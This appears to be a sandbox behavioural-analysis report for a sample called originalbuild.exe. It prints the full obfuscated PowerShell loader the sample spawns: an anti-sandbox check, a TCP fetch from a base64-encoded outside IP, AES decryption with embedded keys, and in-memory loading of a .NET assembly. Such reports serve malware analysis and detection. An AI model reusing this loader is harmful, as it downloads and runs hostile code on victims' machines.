
Behavioral Analysis

Process tree

  • originalbuild.exe "C:\Users\test22\AppData\Local\Temp\originalbuild.exe"

    2644
    • powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); 
$crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);

      2744
